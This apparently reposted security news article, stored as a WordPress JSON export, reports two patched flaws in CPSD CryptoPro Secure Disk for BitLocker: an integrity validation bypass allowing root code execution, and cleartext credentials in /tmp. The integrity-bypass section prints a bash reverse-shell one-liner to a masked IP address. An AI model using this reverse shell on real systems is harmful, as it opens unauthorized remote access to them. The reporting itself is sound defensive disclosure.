{"id":10924,"date":"2026-02-25T10:03:42","date_gmt":"2026-02-25T10:03:42","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/02\/25\/multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft\/"},"modified":"2026-02-25T10:03:42","modified_gmt":"2026-02-25T10:03:42","slug":"multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/02\/25\/multiple-vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker-allow-root-access-and-credential-theft\/","title":{"rendered":"Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft"},"content":{"rendered":"

Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft
\n \t

\n
<\/BR>
\n
\n \t

\n
<\/BR><\/p>\n

\n

Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution.<\/p>\n

These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials<\/a>.<\/p>\n

The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection.<\/p>\n

\n\n\n\n\n\n\n
CVE<\/th>\nCVSS<\/th>\nDetails<\/th>\n<\/tr>\n<\/thead>\n
CVE-2025-10010<\/strong><\/td>\nN\/A<\/td>\nIntegrity bypass enables root code execution.<\/td>\n<\/tr>\n
N\/A<\/td>\nN\/A<\/td>\nCleartext \/tmp<\/code> data exposes credentials.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n

Integrity Validation Bypass<\/strong><\/h2>\n

The first vulnerability, designated as CVE-2025-10010, involves an integrity validation bypass.<\/a><\/p>\n

CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then decrypts the Windows partition with BitLocker<\/a>.<\/p>\n

This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium.<\/p>\n

While the system uses the Linux kernel\u2019s Integrity Measurement Architecture (IMA) to verify files<\/a>, researchers found that IMA does not validate certain configuration files.<\/p>\n

bash -c \u2018exec bash -i &>\/dev\/tcp\/192.168.XXX.XXX\/9999 <&1′ &<\/p>\n

By manipulating these files, an attacker can execute arbitrary code with root privileges<\/a>. This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors.<\/p>\n

\n\n\n\n\n\n
Product<\/th>\nVulnerable Versions<\/th>\nFixed Versions<\/th>\n<\/tr>\n<\/thead>\n
CPSD CryptoPro Secure Disk<\/td>\n< 7.6.6 \/ < 7.7.1<\/td>\n7.6.6 \/ 7.7.1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n

ClearText Storage of Sensitive Data<\/strong><\/h2>\n

The second issue concerns the storage of sensitive data in clear text<\/a>. When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network.<\/p>\n

According to SEC Consult<\/a>, to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary \u2018\/tmp\u2019 folder.<\/p>\n

If an attacker has already gained access to the Linux environment<\/a>, perhaps through the first vulnerability, they can easily read these files.<\/p>\n

\"Cleartext
Cleartext certificate credentials expose WLAN access and enable 802.1X bypass(source : sec-consult)<\/figcaption><\/figure>\n

This information could then be used to access internal networks or bypass network access controls, further compromising the organization\u2019s infrastructure.<\/p>\n

The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities.<\/p>\n

Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0.<\/p>\n

Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications.<\/p>\n

SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses.<\/p>\n

Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n

The post Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n

\t

\n
<\/BR>
\n Abinaya
\n \t

\n
<\/BR>
\nGo to cyber-security-news<\/a>
\n \t

\n
<\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"

Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution. These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials. The issues […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[533,2015,129,63,416],"tags":[130],"class_list":["post-10924","post","type-post","status-publish","format-standard","hentry","category-bitlocker","category-cve-vulnerabilities","category-cyber-security","category-cyber-security-news","category-vulnerabilities","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10924"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=10924"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/10924\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=10924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=10924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=10924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}